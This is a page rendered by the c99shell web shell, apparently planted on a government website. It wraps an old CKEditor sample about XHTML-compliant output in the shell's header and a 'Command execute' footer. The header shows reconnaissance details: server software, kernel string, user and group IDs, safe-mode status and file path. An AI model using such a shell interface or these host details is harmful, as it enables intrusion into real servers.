Software: Apache/2.2.22 (Debian). PHP/5.6.36 uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) Safe-mode: OFF (not secure) /home/h33678/data/www/old.zt-rada.gov.ua/modules-alien/ckeditor/samples/old/ drwxr-xr-x |
Viewing file: Select action/file-type: CKEditor Samples » Producing XHTML Compliant Output
This sample is not maintained anymore. Check out its brand new version in CKEditor SDK.
This sample shows how to configure CKEditor to output valid
XHTML 1.1 code.
Deprecated elements ( To add a CKEditor instance outputting valid XHTML code, load the editor using a standard JavaScript call and define CKEditor features to use the XHTML compliant elements and styles. A snippet of the configuration code can be seen below; check the source of this page for full definition: CKEDITOR.replace( 'textarea_id', { contentsCss: 'assets/outputxhtml.css', coreStyles_bold: { element: 'span', attributes: { 'class': 'Bold' } }, coreStyles_italic: { element: 'span', attributes: { 'class': 'Italic' } }, ... }); |
:: Command execute :: | |
--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0137 ]-- |